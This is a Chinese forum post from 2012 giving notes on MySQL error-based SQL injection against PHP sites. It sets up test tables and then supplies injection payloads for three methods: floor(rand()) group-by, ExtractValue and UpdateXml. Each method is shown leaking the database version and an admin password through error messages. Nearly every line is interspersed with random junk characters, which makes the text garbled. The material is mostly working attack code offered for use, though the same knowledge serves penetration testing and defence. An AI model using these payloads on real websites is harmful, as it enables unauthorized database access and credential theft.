放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。6 D! o% d/ R+ V4 c" Q
实际测试环境:& _! \/ N. c5 {1 A- F/ b2 ^& m
: H$ s% e& y, P1 W* P
( V9 Q* i' V" F% c7 Zmysql> show tables;5 B) S" Q1 K# g F8 J, f6 X4 D4 x
+----------------+
/ a4 Y! m. \3 E8 `| Tables_in_test |
: I; s9 t L5 [+----------------+- m) C- m, M' J, {( ]4 n
| admin |
O, L& q# H" y% F! \2 y; `" W| article |
|% k+ H' r7 n* V& s/ A+----------------+
' ~8 R0 \: o- Y
! d) b1 y* {6 I# D6 h7 M
3 s* @, e/ k3 w. a- m7 z: | 8 `# b D" b7 O9 X4 d Z3 \7 J
mysql> describe admin;
L& a5 q# q( c" _% y+ Y+-------+------------------+------+-----+---------+----------------+
! ]9 e3 w; q$ a) v| Field | Type | Null | Key | Default | Extra |
7 B6 |( I& ]( ~: s, D+-------+------------------+------+-----+---------+----------------+) E6 f7 \) H' a4 f
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
. {5 P) \9 |% q| user | varchar(50) | NO | | NULL | |
7 ^) m f$ H3 \" q1 u6 Y| pass | varchar(50) | NO | | NULL | |
$ s# c- M7 ^$ [. q( \$ `) F) ^* _$ e+-------+------------------+------+-----+---------+----------------+
9 q- X, K$ J% p4 w* |2 h5 Y0 @4 X
" [2 f( l( b! c4 ^& @ % M1 c7 h3 a0 r( y
" n- l/ z" L5 n7 {
mysql> describe article;9 q* Q4 ~, y) c3 D
+---------+------------------+------+-----+---------+----------------+
) q( e! a6 J3 `( z| Field | Type | Null | Key | Default | Extra |
# d# b. t. V2 L+---------+------------------+------+-----+---------+----------------+/ g: k' J0 i3 w/ X9 ^
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |) O5 y0 V% u9 \, y& h1 }
| title | varchar(50) | NO | | NULL | |6 D& q8 }; h: B" _$ r
| content | varchar(50) | NO | | NULL | |6 W8 H& _# B+ f$ N# V, I
+---------+------------------+------+-----+---------+----------------+
6 v8 W L C* b8 h, v, k1、通过floor报错
! |% K% c4 c) B% S$ n( B9 o可以通过如下一些利用代码
9 A, E7 K! V4 x4 M6 [
/ F2 P0 s, y. r- L/ L+ S
4 c( q/ I4 }* V% Cand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x. F# F" S' o6 ~3 f/ l& O
from information_schema.tables group by x)a);
4 t' {" e% f0 q% z$ Z
J6 m( j( K% { 6 u6 \4 j+ l. S* q' t6 j* I
and (select count(*) from (select 1 union select null union select !1)x
1 q$ Z/ q1 K7 V' u7 t) hgroup by concat((select table_name from information_schema.tables limit 1),8 Q! v5 o1 b/ c8 X7 o8 m& Q
floor(rand(0)*2)));& `$ M. s w# \4 v& r& U
举例如下:
( ]: A% \4 d. `8 d首先进行正常查询:# N* z' q$ y0 w2 a- e% J' E3 ]
! s4 e6 @6 T1 F' j* X6 d8 R
mysql> select * from article where id = 1;
' z% b: g+ Z! E" _8 |+----+-------+---------+3 Q2 t3 p# m* [% n) x
| id | title | content |( o1 l# j" h' }& \) L: T
+----+-------+---------+4 Q8 U b5 _8 Q" g
| 1 | test | do it |) r- Y1 Z6 H- F) F7 f
+----+-------+---------++ G9 @. d* f0 X5 z- G
假如id输入存在注入的话,可以通过如下语句进行报错。$ f( {' ^; }7 |/ a l l( K: V
1 E9 l. f3 k7 }) O 3 N, u, q$ r" C5 R; J
mysql> select * from article where id = 1 and (select 1 from' x. _( L' n7 N
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);8 C- _3 D! l. \9 B) \7 n |
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'2 Q* W% `" l% F" C3 W
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。) ?- q& [/ M+ r8 V0 H7 ]# X& T
例如我们需要查询管理员用户名和密码:
8 a2 i' g$ P% D; x8 DMethod1:1 j% g6 k6 v0 i3 o- h. h
& r& v# [& I$ i
* H" W! Q9 c0 Q5 j {* x
mysql> select * from article where id = 1 and (select 1 from/ M+ F$ V# Q0 T9 p( M5 c
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
! O" `- m }+ V+ ^from information_schema.tables group by x)a);5 l5 R }# c# k/ O
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
/ l6 b# x, U1 _; g6 e4 zMethod2:
& P, @9 p' F& @$ ]3 P( N9 @6 U4 E2 w
& p- v/ U' d2 x( O" x 0 h% Q8 q4 b+ j% W
mysql> select * from article where id = 1 and (select count(*)
) ` j3 `5 L# g8 p0 f3 mfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1), o" y! f* l k H" }; E/ Z, ^
floor(rand(0)*2)));# d. A l3 `2 B6 R3 F
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
8 p$ F1 J4 t! V: O; W) n2、ExtractValue
# I! F# E/ x/ q% _* G测试语句如下' r" W3 B" N7 ~4 s* n! R) _& b
* \ o7 g8 s% ~- L, Z8 X) X; _
3 u" \ [! L5 b- }0 X: Tand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
$ r: `) ?& U5 ~* ~, x# A$ S实际测试过程
0 U/ N8 Y* Y" S4 _1 _- p; V
! V3 H$ y; Y. G + |$ S& o3 e1 t5 o$ v( s5 L
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
# U) c- Y( Q2 w$ X% q4 L; ]8 n(select pass from admin limit 1)));--
. y2 O: t1 I& x8 V) ?# ?ERROR 1105 (HY000): XPATH syntax error: '\admin888'
# O2 a2 E" n3 M9 `8 P3、UpdateXml
8 T" m% ^0 P/ M% Z( x( ?测试语句* M+ z7 O. |, e1 {9 w8 ^
; N' ]8 w6 J, F# ]' z7 u/ e $ m$ q4 `' @& V$ H4 g: K
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
6 u9 D: [" ]5 m' f6 m实际测试过程5 T$ @% X$ F; ~3 v
9 w1 g/ k- E. y8 q ) U; c" z u( k# r3 X( y
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
$ z' I& o4 U G) l- s7 F# g(select pass from admin limit 1),0x5e24),1));6 i2 X, L7 |5 B3 V9 o1 K; E
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'' m) U- G- o$ `2 p
All, thanks foreign guys.; D: w+ s; V0 B
9 l. F0 L. n& b' i
) Q- {- h# a5 M1 h
|
发表于 2012-12-10 10:28:51
收藏
支持
反对